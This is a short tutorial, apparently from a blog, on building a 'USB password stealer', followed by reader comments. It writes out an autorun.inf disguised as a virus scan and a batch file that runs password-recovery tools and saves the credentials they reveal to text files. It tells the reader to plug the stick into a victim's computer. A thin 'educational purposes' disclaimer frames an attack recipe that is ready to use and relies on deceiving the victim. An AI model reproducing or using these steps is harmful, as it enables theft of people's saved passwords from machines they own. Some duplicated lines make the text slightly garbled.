USB Stealer
USB Stealer
education purpose only...
education purpose only...
Windows allows the storage of the passwords, as do modern browsers.
While this feature is convenient for users, it has imposed itself as a
big security risk among organizations. We know that browsers store most
passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords,
etc. Most people lack time and ask their browsers to save their
passwords. As we know, there are many tools available to recover saved
passwords, so in this article I will explain to you how to make
aUSB passwordstealer and steal saved passwords.
Just to explain the concept, we are going to collect some password
stealing tools, tools that are freely available on the internet and
capable of stealing the passwords stored in the browsers or other
windows files.
Then, we create a batch program that will execute these combined
programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also
make this batch file execute as an auto-run for the USB stick,
effectively stealing the passwords as we plug it in.
THINGS YOU WILL NEED
- MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications. download link
- Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc. download link
- IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer. download_bulletspassview
- Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the protected-storage-passview
- passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.
- Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
- ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames
- and passwords stored by Google Chrome Web browser.
STEPS :
1. First of all download all 5 tools and copy the executables (.exe
files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe
and passwordfox.exe into yourUSB Drive.
2. Create a new Notepad and input the following text:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto yourUSB Stick.
Now copy the "autorun.inf" file onto yourUSB Stick.
3. Create another Notepad and write the following text onto
it:
it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start
passwordfox.exe /stext passwordfox.txt
4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"
5. Copy the "launch.bat" file onto your USBdrive. Now
your USB Password stealer is ready, all you have to do is insert it in
your victim's computer and a popup will appear. In the popup window,
select the option "launch virus scan."
After this you can see saved password in .TXT files
Purely for educational purposes. Use these tools at your own risk!

you have any problem ask me.
ReplyDeleteautorun doesnt work for w7 and above as much as i know yes ?
ReplyDeleteOki will update it soon.thankz for comment.
Delete